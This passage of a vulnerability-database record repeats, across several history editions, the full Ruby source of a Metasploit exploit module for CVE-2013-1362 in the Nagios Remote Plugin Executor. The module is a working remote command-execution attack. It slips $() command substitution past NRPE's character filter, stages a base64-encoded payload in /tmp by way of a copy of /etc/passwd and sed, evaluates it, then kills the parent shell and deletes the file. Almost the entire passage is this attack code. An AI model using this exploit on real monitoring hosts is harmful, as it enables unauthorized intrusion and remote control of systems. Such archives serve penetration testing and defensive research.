vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-06T22:15:15", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-07T00:19:28", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-07T00:19:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-07T00:19:28", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-07T02:16:10", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-07T02:16:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-07T02:16:10", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-25T11:05:10", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-25T11:05:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-25T11:05:10", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-25T12:55:42", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-25T12:55:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-25T12:55:42", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-27T12:58:46", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-27T12:58:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: 